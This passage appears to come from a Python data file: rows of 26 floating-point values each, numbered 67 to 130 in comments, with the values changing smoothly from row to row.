(16.59994825633087, 14.324578235025148, 13.340760859625059, 14.407499691358025, 11.999983176072671, 5.833333333333334, 5.909205454692165, 4.927991769547327, 6.269782551440329, 2.8041851486053964, 2.1678765099555233, 1.23432367017223, 0.0, 16.2, 13.577560371894528, 10.839382549777614, 8.412555445816189, 12.539565102880658, 6.899188477366257, 5.909205454692165, 4.166666666666667, 5.999991588036336, 4.802499897119342, 2.6681521719250116, 1.3022343850022864, 0.0), # 67
(16.59966658316932, 14.275431337669806, 13.325874599908552, 14.39237008856683, 11.999869818983834, 5.833225077478026, 5.890812155863717, 4.905562566681908, 6.263513519280598, 2.795848176658867, 2.1654095969441007, 1.2323373362532992, 0.0, 16.19980024005487, 13.555710698786289, 10.827047984720503, 8.3875445299766, 12.527027038561195, 6.867787593354672, 5.890812155863717, 4.166589341055733, 5.999934909491917, 4.797456696188944, 2.6651749199817103, 1.29776648524271, 0.0), # 68
(16.597026731078905, 14.22556009557945, 13.310651234567901, 14.376340217391304, 11.998838053740013, 5.832369272976682, 5.872214545077291, 4.8833991769547325, 6.256958847736625, 2.7875225562817723, 2.162630090377459, 1.2302958631145768, 0.0, 16.198217592592595, 13.533254494260342, 10.813150451887294, 8.362567668845315, 12.51391769547325, 6.8367588477366255, 5.872214545077291, 4.165978052126201, 5.999419026870006, 4.792113405797102, 2.66213024691358, 1.2932327359617684, 0.0), # 69
(16.59181726009423, 14.174735607770254, 13.295024577046181, 14.359304549114333, 11.996799268404205, 5.8306838388457045, 5.853328107649096, 4.861301630848957, 6.2500815424477985, 2.7791678097850943, 2.159506369740288, 1.228189701505708, 0.0, 16.195091735253776, 13.510086716562785, 10.797531848701441, 8.337503429355282, 12.500163084895597, 6.80582228318854, 5.853328107649096, 4.164774170604074, 5.998399634202102, 4.786434849704778, 2.6590049154092363, 1.2886123279791142, 0.0), # 70
(16.584111457028687, 14.122988247267578, 13.279000114311843, 14.341288204508857, 11.993779284004411, 5.828196087994717, 5.8341613276311906, 4.8392772443225125, 6.242891845755221, 2.7707841437370564, 2.1560499655423633, 1.226020391628362, 0.0, 16.190463820301783, 13.486224307911982, 10.780249827711817, 8.312352431211167, 12.485783691510441, 6.774988142051518, 5.8341613276311906, 4.162997205710512, 5.9968896420022055, 4.780429401502953, 2.6558000228623686, 1.2839080224788708, 0.0), # 71
(16.573982608695655, 14.070348387096773, 13.262583333333334, 14.322316304347826, 11.989803921568626, 5.824933333333335, 5.81472268907563, 4.817333333333334, 6.2354, 2.762371764705883, 2.1522724082934617, 1.2237894736842108, 0.0, 16.184375, 13.461684210526316, 10.761362041467306, 8.287115294117648, 12.4708, 6.744266666666667, 5.81472268907563, 4.160666666666668, 5.994901960784313, 4.7741054347826095, 2.6525166666666666, 1.2791225806451614, 0.0), # 72
(16.561504001908514, 14.016846400283198, 13.245779721079103, 14.302413969404189, 11.984899002124855, 5.820922887771173, 5.795020676034474, 4.795477213839354, 6.227616247523244, 2.753930879259798, 2.1481852285033574, 1.2214984878749227, 0.0, 16.1768664266118, 13.436483366624147, 10.740926142516786, 8.261792637779392, 12.455232495046488, 6.713668099375096, 5.795020676034474, 4.157802062693695, 5.992449501062428, 4.76747132313473, 2.649155944215821, 1.274258763662109, 0.0), # 73
(16.546748923480646, 13.962512659852205, 13.228594764517604, 14.281606320450884, 11.979090346701094, 5.816192064217854, 5.775063772559778, 4.773716201798507, 6.219550830666057, 2.7454616939670253, 2.143799956681829, 1.219148974402169, 0.0, 16.167979252400553, 13.410638718423858, 10.718999783409142, 8.236385081901075, 12.439101661332113, 6.683202682517909, 5.775063772559778, 4.154422903012753, 5.989545173350547, 4.760535440150296, 2.645718952903521, 1.269319332713837, 0.0), # 74
(16.52979066022544, 13.90737753882915, 13.211033950617283, 14.259918478260868, 11.972403776325345, 5.810768175582992, 5.754860462703601, 4.752057613168724, 6.211213991769547, 2.7369644153957884, 2.13912812333865, 1.2167424734676198, 0.0, 16.157754629629633, 13.384167208143815, 10.695640616693249, 8.210893246187364, 12.422427983539094, 6.652880658436215, 5.754860462703601, 4.150548696844995, 5.986201888162673, 4.7533061594202906, 2.6422067901234567, 1.2643070489844683, 0.0), # 75
(16.510702498956285, 13.851471410239393, 13.193102766346595, 14.237375563607085, 11.964865112025606, 5.804678534776205, 5.734419230517997, 4.730508763907942, 6.2026159731748205, 2.728439250114312, 2.134181258983598, 1.2142805252729445, 0.0, 16.146233710562413, 13.357085778002387, 10.67090629491799, 8.185317750342936, 12.405231946349641, 6.622712269471118, 5.734419230517997, 4.146198953411575, 5.982432556012803, 4.745791854535696, 2.638620553269319, 1.259224673658127, 0.0), # 76
(16.48955772648655, 13.794824647108282, 13.174806698673981, 14.21400269726248, 11.956500174829877, 5.797950454707109, 5.7137485600550235, 4.70907696997409, 6.193767017222985, 2.7198864046908207, 2.1289708941264505, 1.2117646700198144, 0.0, 16.13345764746228, 13.329411370217956, 10.64485447063225, 8.15965921407246, 12.38753403444597, 6.592707757963726, 5.7137485600550235, 4.141393181933649, 5.9782500874149385, 4.738000899087494, 2.6349613397347964, 1.254074967918935, 0.0), # 77
(16.46642962962963, 13.737467622461173, 13.156151234567902, 14.189825, 11.94733478576616, 5.790611248285322, 5.69285693536674, 4.687769547325104, 6.184677366255142, 2.711306085693537, 2.123508559276981, 1.2091964479098987, 0.0, 16.119467592592596, 13.301160927008882, 10.617542796384903, 8.13391825708061, 12.369354732510285, 6.562877366255145, 5.69285693536674, 4.136150891632373, 5.97366739288308, 4.729941666666668, 2.6312302469135807, 1.248860692951016, 0.0), # 78
(16.441391495198904, 13.679430709323423, 13.1371418609968, 14.164867592592593, 11.93739476586245, 5.782688228420464, 5.671752840505201, 4.666593811918916, 6.1753572626124065, 2.702698499690686, 2.117805784944966, 1.2065773991448674, 0.0, 16.104304698216733, 13.27235139059354, 10.58902892472483, 8.108095499072057, 12.350714525224813, 6.533231336686482, 5.671752840505201, 4.130491591728903, 5.968697382931225, 4.721622530864199, 2.6274283721993603, 1.243584609938493, 0.0), # 79
(16.414516610007755, 13.620744280720386, 13.117784064929126, 14.139155595813204, 11.92670593614675, 5.774208708022151, 5.650444759522465, 4.645557079713459, 6.165816948635879, 2.694063853250491, 2.111874101640184, 1.2039090639263914, 0.0, 16.08801011659808, 13.242999703190304, 10.559370508200919, 8.082191559751472, 12.331633897271757, 6.503779911598843, 5.650444759522465, 4.1244347914443935, 5.963352968073375, 4.713051865271069, 2.6235568129858255, 1.23824948006549, 0.0), # 80
(16.385878260869568, 13.56143870967742, 13.098083333333335, 14.112714130434785, 11.915294117647058, 5.765200000000001, 5.628941176470589, 4.624666666666667, 6.156066666666666, 2.685402352941177, 2.1057250398724086, 1.2011929824561405, 0.0, 16.070625, 13.213122807017545, 10.528625199362043, 8.05620705882353, 12.312133333333332, 6.474533333333334, 5.628941176470589, 4.118, 5.957647058823529, 4.704238043478263, 2.619616666666667, 1.2328580645161293, 0.0), # 81
(16.355549734597723, 13.501544369219879, 13.078045153177872, 14.085568317230274, 11.903185131391377, 5.75568941726363, 5.607250575401629, 4.603929888736474, 6.146116659045877, 2.676714205330967, 2.099370130151417, 1.198430694935785, 0.0, 16.052190500685874, 13.182737644293633, 10.496850650757084, 8.030142615992899, 12.292233318091753, 6.445501844231063, 5.607250575401629, 4.111206726616879, 5.951592565695688, 4.695189439076759, 2.6156090306355746, 1.2274131244745345, 0.0), # 82
(16.323604318005607, 13.441091632373114, 13.057675011431185, 14.057743276972625, 11.890404798407703, 5.745704272722655, 5.585381440367643, 4.5833540618808115, 6.135977168114616, 2.667999616988085, 2.0928209029869853, 1.195623741566995, 0.0, 16.03274777091907, 13.151861157236944, 10.464104514934926, 8.003998850964255, 12.271954336229232, 6.416695686633136, 5.585381440367643, 4.104074480516182, 5.945202399203851, 4.6859144256575425, 2.6115350022862374, 1.2219174211248287, 0.0), # 83
(16.290115297906603, 13.380110872162485, 13.036978395061729, 14.029264130434784, 11.876978939724037, 5.735271879286694, 5.563342255420687, 4.562946502057613, 6.125658436213991, 2.659258794480756, 2.0860888888888893, 1.1927736625514405, 0.0, 16.012337962962963, 13.120510288065844, 10.430444444444445, 7.977776383442267, 12.251316872427982, 6.388125102880658, 5.563342255420687, 4.096622770919067, 5.938489469862018, 4.676421376811596, 2.607395679012346, 1.2163737156511352, 0.0), # 84
(16.255155961114095, 13.318632461613346, 13.015960791037951, 14.000155998389694, 11.862933376368382, 5.724419549865368, 5.54114150461282, 4.542714525224815, 6.115170705685108, 2.650491944377203, 2.0791856183669055, 1.1898819980907918, 0.0, 15.991002229080934, 13.088701978998708, 10.395928091834525, 7.951475833131607, 12.230341411370215, 6.35980033531474, 5.54114150461282, 4.088871107046691, 5.931466688184191, 4.666718666129899, 2.6031921582075905, 1.210784769237577, 0.0), # 85
(16.21879959444146, 13.256686773751051, 12.994627686328306, 13.970444001610309, 11.84829392936873, 5.713174597368289, 5.518787671996097, 4.522665447340345, 6.104524218869075, 2.64169927324565, 2.0721226219308098, 1.1869502883867193, 0.0, 15.968781721536352, 13.05645317225391, 10.360613109654047, 7.9250978197369495, 12.20904843773815, 6.331731626276483, 5.518787671996097, 4.080838998120206, 5.924146964684365, 4.656814667203437, 2.5989255372656612, 1.2051533430682777, 0.0), # 86
(16.18111948470209, 13.194304181600955, 12.972984567901234, 13.940153260869565, 11.833086419753089, 5.7015643347050755, 5.496289241622575, 4.5028065843621405, 6.093729218106997, 2.6328809876543215, 2.0649114300903775, 1.1839800736408925, 0.0, 15.945717592592594, 13.023780810049816, 10.324557150451888, 7.898642962962963, 12.187458436213994, 6.303929218106997, 5.496289241622575, 4.072545953360768, 5.9165432098765445, 4.646717753623189, 2.594596913580247, 1.1994821983273598, 0.0), # 87
(16.142188918709373, 13.131515058188414, 12.951036922725194, 13.90930889694042, 11.817336668549451, 5.689616074785349, 5.473654697544313, 4.483145252248133, 6.082795945739979, 2.624037294171441, 2.0575635733553868, 1.1809728940549822, 0.0, 15.921850994513035, 12.990701834604803, 10.287817866776932, 7.8721118825143215, 12.165591891479957, 6.276403353147386, 5.473654697544313, 4.064011481989534, 5.908668334274726, 4.636436298980141, 2.5902073845450393, 1.193774096198947, 0.0), # 88
(16.102081183276677, 13.068349776538785, 12.928790237768634, 13.877936030595814, 11.80107049678582, 5.677357130518723, 5.4508925238133665, 4.463688766956257, 6.07173464410913, 2.6151683993652335, 2.050090582235612, 1.1779302898306583, 0.0, 15.897223079561043, 12.957233188137238, 10.250452911178058, 7.845505198095699, 12.14346928821826, 6.24916427373876, 5.4508925238133665, 4.055255093227659, 5.90053524839291, 4.625978676865272, 2.585758047553727, 1.1880317978671624, 0.0), # 89
(16.06086956521739, 13.004838709677419, 12.906250000000002, 13.846059782608698, 11.784313725490197, 5.664814814814815, 5.428011204481793, 4.444444444444445, 6.060555555555556, 2.606274509803922, 2.04250398724083, 1.1748538011695908, 0.0, 15.871875000000001, 12.923391812865496, 10.212519936204147, 7.818823529411765, 12.121111111111112, 6.222222222222222, 5.428011204481793, 4.046296296296297, 5.892156862745098, 4.615353260869567, 2.5812500000000003, 1.1822580645161291, 0.0), # 90
(16.0186273513449, 12.941012230629672, 12.883421696387746, 13.813705273752014, 11.767092175690575, 5.652016440583244, 5.405019223601649, 4.4254196006706294, 6.049268922420364, 2.597355832055731, 2.0348153188808165, 1.17174496827345, 0.0, 15.845847908093276, 12.889194651007948, 10.174076594404081, 7.792067496167191, 12.098537844840727, 6.195587440938882, 5.405019223601649, 4.037154600416603, 5.883546087845287, 4.604568424584006, 2.5766843392775494, 1.1764556573299705, 0.0), # 91
(15.975427828472597, 12.876900712420905, 12.86031081390032, 13.780897624798712, 11.749431668414964, 5.638989320733629, 5.381925065224994, 4.406621551592746, 6.037884987044658, 2.5884125726888843, 2.027036107665348, 1.1686053313439067, 0.0, 15.819182956104251, 12.85465864478297, 10.135180538326738, 7.765237718066651, 12.075769974089315, 6.169270172229845, 5.381925065224994, 4.027849514809735, 5.874715834207482, 4.593632541599572, 2.5720621627800644, 1.1706273374928098, 0.0), # 92
(15.931344283413848, 12.812534528076466, 12.836922839506174, 13.747661956521743, 11.731358024691357, 5.625760768175583, 5.358737213403881, 4.388057613168725, 6.026413991769548, 2.5794449382716054, 2.0191778841042, 1.1654364305826295, 0.0, 15.791921296296294, 12.819800736408922, 10.095889420521, 7.738334814814815, 12.052827983539096, 6.143280658436215, 5.358737213403881, 4.018400548696845, 5.865679012345678, 4.582553985507248, 2.567384567901235, 1.1647758661887697, 0.0), # 93
(15.886450002982048, 12.74794405062171, 12.813263260173755, 13.714023389694043, 11.712897065547754, 5.612358095818728, 5.335464152190369, 4.369735101356501, 6.014866178936138, 2.5704531353721194, 2.01125217870715, 1.16223980619129, 0.0, 15.764104080932785, 12.784637868104188, 10.056260893535747, 7.711359406116356, 12.029732357872277, 6.117629141899102, 5.335464152190369, 4.008827211299091, 5.856448532773877, 4.571341129898015, 2.5626526520347515, 1.1589040046019738, 0.0), # 94
(15.840818273990577, 12.683159653081995, 12.789337562871514, 13.680007045088567, 11.694074612012159, 5.598808616572678, 5.312114365636515, 4.351661332114007, 6.003251790885536, 2.561437370558649, 2.0032705219839726, 1.1590169983715575, 0.0, 15.735772462277092, 12.749186982087132, 10.016352609919863, 7.684312111675945, 12.006503581771073, 6.09232586495961, 5.312114365636515, 3.999149011837627, 5.847037306006079, 4.560002348362857, 2.5578675125743033, 1.1530145139165453, 0.0), # 95
(15.79452238325282, 12.61821170848268, 12.765151234567902, 13.645638043478261, 11.674916485112563, 5.585139643347051, 5.288696337794377, 4.333843621399177, 5.991581069958848, 2.55239785039942, 1.9952444444444448, 1.1557695473251033, 0.0, 15.706967592592594, 12.713465020576134, 9.976222222222225, 7.657193551198258, 11.983162139917695, 6.067381069958849, 5.288696337794377, 3.9893854595336076, 5.8374582425562815, 4.5485460144927545, 2.553030246913581, 1.1471101553166074, 0.0), # 96
(15.747635617582157, 12.553130589849111, 12.740709762231369, 13.61094150563607, 11.655448505876976, 5.571378489051465, 5.265218552716011, 4.316289285169945, 5.979864258497181, 2.5433347814626543, 1.9871854765983423, 1.152498993253596, 0.0, 15.677730624142663, 12.677488925789556, 9.93592738299171, 7.630004344387961, 11.959728516994362, 6.042804999237923, 5.265218552716011, 3.9795560636081895, 5.827724252938488, 4.536980501878691, 2.5481419524462736, 1.141193689986283, 0.0), # 97
(15.700231263791975, 12.487946670206647, 12.71601863283036, 13.575942552334945, 11.635696495333388, 5.557552466595541, 5.241689494453475, 4.299005639384241, 5.968111598841639, 2.5342483703165772, 1.9791051489554419, 1.1492068763587067, 0.0, 15.648102709190674, 12.64127563994577, 9.89552574477721, 7.60274511094973, 11.936223197683278, 6.018607895137937, 5.241689494453475, 3.969680333282529, 5.817848247666694, 4.525314184111649, 2.5432037265660723, 1.1352678791096953, 0.0), # 98
(15.652382608695653, 12.422690322580646, 12.691083333333335, 13.540666304347827, 11.615686274509805, 5.543688888888889, 5.218117647058825, 4.282000000000001, 5.956333333333333, 2.5251388235294123, 1.9710149920255189, 1.1458947368421055, 0.0, 15.618125000000001, 12.604842105263158, 9.855074960127594, 7.575416470588236, 11.912666666666667, 5.9948000000000015, 5.218117647058825, 3.9597777777777776, 5.807843137254903, 4.51355543478261, 2.5382166666666675, 1.129335483870968, 0.0), # 99
(15.60416293910658, 12.357391919996457, 12.665909350708734, 13.505137882447666, 11.595443664434223, 5.529815068841132, 5.194511494584116, 4.265279682975157, 5.944539704313367, 2.516006347669384, 1.9629265363183495, 1.1425641149054624, 0.0, 15.58783864883402, 12.568205263960085, 9.814632681591746, 7.54801904300815, 11.889079408626735, 5.97139155616522, 5.194511494584116, 3.9498679063150943, 5.797721832217111, 4.501712627482556, 2.533181870141747, 1.1233992654542237, 0.0), # 100
(15.555645541838135, 12.292081835479447, 12.640502171925013, 13.469382407407409, 11.574994486134646, 5.515958319361886, 5.17087952108141, 4.248852004267642, 5.932740954122847, 2.506851149304716, 1.9548513123437101, 1.1392165507504473, 0.0, 15.557284807956103, 12.531382058254918, 9.77425656171855, 7.520553447914146, 11.865481908245695, 5.948392805974699, 5.17087952108141, 3.9399702281156324, 5.787497243067323, 4.48979413580247, 2.528100434385003, 1.1174619850435863, 0.0), # 101
(15.506903703703706, 12.22679044205496, 12.614867283950618, 13.433425000000002, 11.554364560639069, 5.5021459533607695, 5.1472302106027605, 4.2327242798353915, 5.920947325102881, 2.497673435003632, 1.9468008506113774, 1.135853584578731, 0.0, 15.526504629629631, 12.49438943036604, 9.734004253056886, 7.493020305010894, 11.841894650205761, 5.925813991769548, 5.1472302106027605, 3.93010425240055, 5.7771822803195345, 4.477808333333335, 2.522973456790124, 1.1115264038231782, 0.0), # 102
(15.458010711516671, 12.161548112748353, 12.589010173754001, 13.397290780998391, 11.533579708975497, 5.488405283747397, 5.123572047200224, 4.2169038256363365, 5.909169059594573, 2.4884734113343563, 1.9387866816311266, 1.132476756591983, 0.0, 15.495539266117968, 12.457244322511812, 9.693933408155633, 7.4654202340030675, 11.818338119189146, 5.903665355890872, 5.123572047200224, 3.920289488390998, 5.766789854487748, 4.465763593666131, 2.5178020347508006, 1.1055952829771232, 0.0), # 103
(15.409039852090416, 12.096385220584981, 12.562936328303612, 13.361004871175524, 11.512665752171923, 5.474763623431389, 5.099913514925861, 4.201397957628411, 5.897416399939034, 2.479251284865113, 1.9308203359127338, 1.129087606991874, 0.0, 15.464429869684501, 12.419963676910612, 9.654101679563668, 7.437753854595337, 11.794832799878067, 5.881957140679775, 5.099913514925861, 3.9105454453081343, 5.756332876085962, 4.4536682903918425, 2.5125872656607227, 1.099671383689544, 0.0), # 104
(15.360064412238325, 12.031332138590201, 12.536651234567902, 13.324592391304346, 11.491648511256354, 5.461248285322361, 5.076263097831727, 4.186213991769549, 5.885699588477366, 2.470007262164126, 1.922913343965976, 1.125687675980074, 0.0, 15.433217592592593, 12.382564435780811, 9.61456671982988, 7.410021786492376, 11.771399176954732, 5.860699588477368, 5.076263097831727, 3.9008916323731144, 5.745824255628177, 4.44153079710145, 2.5073302469135803, 1.093757467144564, 0.0), # 105
(15.311157678773782, 11.96641923978937, 12.510160379515318, 13.28807846215781, 11.470553807256785, 5.44788658232993, 5.052629279969876, 4.1713592440176805, 5.8740288675506775, 2.4607415497996183, 1.9150772363006283, 1.1222785037582528, 0.0, 15.401943587105624, 12.345063541340778, 9.575386181503141, 7.382224649398854, 11.748057735101355, 5.839902941624753, 5.052629279969876, 3.8913475588070923, 5.735276903628392, 4.429359487385938, 2.5020320759030636, 1.0878562945263066, 0.0), # 106
(15.26239293851017, 11.901676897207842, 12.483469250114315, 13.251488204508856, 11.449407461201215, 5.434705827363715, 5.0290205453923695, 4.156841030330743, 5.862414479500076, 2.451454354339816, 1.9073235434264675, 1.1188616305280807, 0.0, 15.370649005486968, 12.307477935808887, 9.536617717132337, 7.354363063019447, 11.724828959000153, 5.819577442463041, 5.0290205453923695, 3.8819327338312255, 5.724703730600607, 4.417162734836286, 2.496693850022863, 1.081970627018895, 0.0), # 107
(15.21384347826087, 11.83713548387097, 12.456583333333336, 13.214846739130437, 11.428235294117645, 5.421733333333335, 5.0054453781512604, 4.142666666666667, 5.850866666666667, 2.442145882352942, 1.8996637958532698, 1.1154385964912283, 0.0, 15.339375000000002, 12.26982456140351, 9.498318979266347, 7.326437647058825, 11.701733333333333, 5.799733333333334, 5.0054453781512604, 3.8726666666666674, 5.714117647058822, 4.40494891304348, 2.4913166666666675, 1.076103225806452, 0.0), # 108
(15.16558258483927, 11.772825372804107, 12.429508116140834, 13.17817918679549, 11.40706312703408, 5.408996413148403, 4.98191226229861, 4.128843468983388, 5.839395671391555, 2.4328163404072196, 1.8921095240908108, 1.112010941849365, 0.0, 15.308162722908094, 12.232120360343014, 9.460547620454054, 7.298449021221657, 11.67879134278311, 5.780380856576743, 4.98191226229861, 3.8635688665345733, 5.70353156351704, 4.392726395598498, 2.485901623228167, 1.0702568520731008, 0.0), # 109
(15.117683545058746, 11.708776937032614, 12.402249085505263, 13.141510668276972, 11.385916780978512, 5.396522379718539, 4.9584296818864715, 4.1153787532388355, 5.828011736015851, 2.423465935070874, 1.8846722586488671, 1.108580206804162, 0.0, 15.277053326474624, 12.194382274845779, 9.423361293244335, 7.27039780521262, 11.656023472031702, 5.76153025453437, 4.9584296818864715, 3.8546588426560997, 5.692958390489256, 4.380503556092325, 2.4804498171010527, 1.0644342670029652, 0.0), # 110
(15.07021964573269, 11.64502054958184, 12.374811728395064, 13.104866304347826, 11.36482207697894, 5.384338545953361, 4.935006120966905, 4.102279835390947, 5.816725102880659, 2.4140948729121283, 1.8773635300372145, 1.1051479315572885, 0.0, 15.246087962962964, 12.156627247130173, 9.386817650186073, 7.242284618736384, 11.633450205761317, 5.743191769547326, 4.935006120966905, 3.845956104252401, 5.68241103848947, 4.368288768115943, 2.474962345679013, 1.0586382317801675, 0.0), # 111
(15.02326417367448, 11.581586583477144, 12.347201531778696, 13.068271215781, 11.34380483606337, 5.372472224762486, 4.911650063591967, 4.089554031397653, 5.805546014327083, 2.404703360499207, 1.8701948687656293, 1.101715656310415, 0.0, 15.215307784636488, 12.118872219414563, 9.350974343828147, 7.214110081497619, 11.611092028654166, 5.725375643956714, 4.911650063591967, 3.837480160544633, 5.671902418031685, 4.356090405260334, 2.469440306355739, 1.0528715075888313, 0.0), # 112
(14.976806757924871, 11.51861130755273, 12.319490437669426, 13.031800658990448, 11.322854058851952, 5.3609451179335466, 4.888420770925416, 4.077235045853738, 5.794513499337931, 2.3953218946450923, 1.8631797083074313, 1.098292391533924, 0.0, 15.184710241349155, 12.081216306873161, 9.315898541537155, 7.185965683935276, 11.589026998675863, 5.708129064195233, 4.888420770925416, 3.829246512809676, 5.661427029425976, 4.343933552996817, 2.4638980875338854, 1.0471464825047938, 0.0), # 113
(14.930369436640104, 11.456715869170786, 12.292060900028826, 12.995747305532802, 11.301752911537415, 5.349730967961242, 4.865614566728464, 4.065474173003413, 5.783796819046966, 2.3861260671651134, 1.8563318232301862, 1.094921622948397, 0.0, 15.154040662656056, 12.044137852432362, 9.28165911615093, 7.1583782014953385, 11.567593638093932, 5.691663842204779, 4.865614566728464, 3.821236405686601, 5.6508764557687075, 4.331915768510935, 2.4584121800057654, 1.0415196244700715, 0.0), # 114
(14.883815844806392, 11.395922558068468, 12.264929243609757, 12.960101406218136, 11.280434856414509, 5.338800611665514, 4.84324772015325, 4.054268436185806, 5.773399988623354, 2.3771301311952313, 1.8496412030472253, 1.091605011007847, 0.0, 15.123210610656603, 12.007655121086316, 9.248206015236125, 7.131390393585693, 11.546799977246708, 5.675975810660129, 4.84324772015325, 3.8134290083325095, 5.640217428207254, 4.320033802072713, 2.452985848721952, 1.0359929598244064, 0.0), # 115
(14.837087797180216, 11.336142812561162, 12.238042919978499, 12.924799380319683, 11.25886776147603, 5.328128285467958, 4.821283854022315, 4.043586875265996, 5.763296714254843, 2.3683173433798195, 1.8430949150057288, 1.0883364263316462, 0.0, 15.092171615609425, 11.971700689648106, 9.215474575028642, 7.104952030139457, 11.526593428509686, 5.661021625372395, 4.821283854022315, 3.8058059181913984, 5.629433880738015, 4.308266460106562, 2.4476085839957, 1.0305584375055605, 0.0), # 116
(14.790127108518035, 11.277288070964257, 12.211349380701316, 12.88977764711069, 11.237019494714783, 5.317688225790165, 4.799686591158202, 4.033398530109057, 5.753460702129175, 2.359670960363252, 1.8366800263528757, 1.085109739539167, 0.0, 15.06087520777316, 11.936207134930834, 9.183400131764378, 7.079012881089755, 11.50692140425835, 5.6467579421526795, 4.799686591158202, 3.7983487327072605, 5.6185097473573915, 4.296592549036898, 2.4422698761402635, 1.0252080064512963, 0.0), # 117
(14.742875593576338, 11.21926977159314, 12.18479607734449, 12.854972625864399, 11.214857924123566, 5.3074546690537305, 4.7784195543834524, 4.023672440580065, 5.743865658434098, 2.351174238789904, 1.8303836043358468, 1.0819188212497801, 0.0, 15.02927291740644, 11.901107033747579, 9.151918021679233, 7.053522716369711, 11.487731316868196, 5.633141416812091, 4.7784195543834524, 3.791039049324093, 5.607428962061783, 4.284990875288134, 2.436959215468898, 1.0199336155993766, 0.0), # 118
(14.695275067111588, 11.161999352763203, 12.158330461474298, 12.820320735854047, 11.192350917695169, 5.297401851680244, 4.757446366520605, 4.014377646544097, 5.734485289357356, 2.3428104353041492, 1.824192716201821, 1.0787575420828581, 0.0, 14.997316274767892, 11.866332962911438, 9.120963581009105, 7.028431305912447, 11.468970578714712, 5.620128705161736, 4.757446366520605, 3.7838584654858884, 5.5961754588475845, 4.273440245284683, 2.43166609229486, 1.014727213887564, 0.0), # 119
(14.647267343880259, 11.105388252789831, 12.131899984657018, 12.785758396352872, 11.169466343422396, 5.287504010091301, 4.736730650392203, 4.005483187866229, 5.7252933010866975, 2.3345628065503625, 1.818094429197978, 1.0756197726577732, 0.0, 14.964956810116156, 11.831817499235502, 9.090472145989889, 7.003688419651086, 11.450586602173395, 5.60767646301272, 4.736730650392203, 3.7767885786366437, 5.584733171711198, 4.2619194654509585, 2.4263799969314035, 1.0095807502536214, 0.0), # 120
(14.59879423863883, 11.049347909988416, 12.105452098458917, 12.751222026634121, 11.146172069298046, 5.277735380708496, 4.716236028820784, 3.9969581044115383, 5.716263399809866, 2.326414609172919, 1.812075810571498, 1.0724993835938965, 0.0, 14.932146053709857, 11.797493219532859, 9.060379052857488, 6.979243827518756, 11.432526799619732, 5.595741346176154, 4.716236028820784, 3.769810986220354, 5.573086034649023, 4.250407342211375, 2.4210904196917835, 1.0044861736353108, 0.0), # 121
(14.549797566143766, 10.993789762674343, 12.078934254446281, 12.716648045971027, 11.122435963314915, 5.268070199953418, 4.695926124628894, 3.9887714360450994, 5.707369291714607, 2.3183490998161913, 1.8061239275695606, 1.0693902455106004, 0.0, 14.898835535807633, 11.763292700616601, 9.030619637847803, 6.955047299448573, 11.414738583429214, 5.584280010463139, 4.695926124628894, 3.762907285681013, 5.561217981657458, 4.238882681990344, 2.4157868508892566, 0.9994354329703949, 0.0), # 122
(14.50021914115155, 10.938625249163001, 12.052293904185383, 12.681972873636834, 11.098225893465804, 5.258482704247664, 4.675764560639071, 3.9808922226319887, 5.698584682988669, 2.3103495351245553, 1.8002258474393456, 1.0662862290272563, 0.0, 14.864976786668116, 11.729148519299818, 9.001129237196727, 6.931048605373665, 11.397169365977337, 5.573249111684785, 4.675764560639071, 3.7560590744626166, 5.549112946732902, 4.227324291212279, 2.4104587808370765, 0.9944204771966367, 0.0), # 123
(14.450000778418648, 10.883765807769782, 12.025478499242494, 12.647132928904785, 11.073509727743506, 5.248947130012824, 4.655714959673856, 3.9732895040372846, 5.689883279819794, 2.302399171742385, 1.794368637428032, 1.063181204763237, 0.0, 14.830521336549939, 11.694993252395603, 8.971843187140161, 6.907197515227153, 11.379766559639588, 5.562605305652198, 4.655714959673856, 3.74924795000916, 5.536754863871753, 4.215710976301596, 2.405095699848499, 0.9894332552517985, 0.0), # 124
(14.399084292701534, 10.82912287681007, 11.9984354911839, 12.612064631048113, 11.048255334140823, 5.239437713670492, 4.635740944555791, 3.965932320126061, 5.68123878839573, 2.294481266314054, 1.7885393647828007, 1.0600690433379134, 0.0, 14.795420715711726, 11.660759476717045, 8.942696823914003, 6.883443798942161, 11.36247757679146, 5.552305248176485, 4.635740944555791, 3.7424555097646373, 5.524127667070411, 4.204021543682705, 2.39968709823678, 0.9844657160736429, 0.0), # 125
(14.347411498756685, 10.774607894599258, 11.971112331575865, 12.576704399340066, 11.022430580650552, 5.229928691642264, 4.615806138107416, 3.958789710763395, 5.6726249149042225, 2.2865790754839375, 1.7827250967508306, 1.0569436153706582, 0.0, 14.759626454412127, 11.626379769077237, 8.913625483754151, 6.859737226451811, 11.345249829808445, 5.542305595068753, 4.615806138107416, 3.735663351173045, 5.511215290325276, 4.192234799780023, 2.394222466315173, 0.9795098085999328, 0.0), # 126
(14.294924211340579, 10.720132299452729, 11.943456471984673, 12.54098865305388, 10.996003335265492, 5.220394300349728, 4.595874163151275, 3.951830715814364, 5.664015365533016, 2.27867585589641, 1.7769129005793014, 1.0537987914808424, 0.0, 14.723090082909758, 11.591786706289264, 8.884564502896506, 6.836027567689229, 11.328030731066033, 5.53256300214011, 4.595874163151275, 3.728853071678377, 5.498001667632746, 4.1803295510179606, 2.388691294396935, 0.97455748176843, 0.0), # 127
(14.241564245209673, 10.665607529685879, 11.915415363976601, 12.504853811462798, 10.968941465978443, 5.210808776214481, 4.575908642509906, 3.9450243751440417, 5.655383846469858, 2.2707548641958457, 1.7710898435153934, 1.0506284422878387, 0.0, 14.68576313146326, 11.556912865166222, 8.855449217576966, 6.812264592587535, 11.310767692939717, 5.523034125201659, 4.575908642509906, 3.722006268724629, 5.484470732989221, 4.168284603820934, 2.3830830727953205, 0.9696006845168982, 0.0), # 128
(14.187273415120451, 10.610945023614088, 11.886936459117921, 12.468236293840059, 10.9412128407822, 5.201146355658116, 4.555873199005851, 3.938339728617507, 5.646704063902494, 2.2627993570266187, 1.765242992806286, 1.0474264384110183, 0.0, 14.647597130331262, 11.5216908225212, 8.82621496403143, 6.788398071079855, 11.293408127804987, 5.51367562006451, 4.555873199005851, 3.7151045397557967, 5.4706064203911, 4.156078764613354, 2.377387291823584, 0.9646313657830989, 0.0), # 129
(14.131993535829388, 10.556056219552751, 11.857967208974907, 12.431072519458905, 10.91278532766956, 5.191381275102222, 4.53573145546165, 3.9317458160998338, 5.637949724018666, 2.2547925910331035, 1.7593594156991588, 1.044186650469754, 0.0, 14.608543609772397, 11.48605315516729, 8.796797078495793, 6.764377773099309, 11.275899448037332, 5.504444142539767, 4.53573145546165, 3.7081294822158726, 5.45639266383478, 4.1436908398196355, 2.3715934417949813, 0.9596414745047956, 0.0), # 130
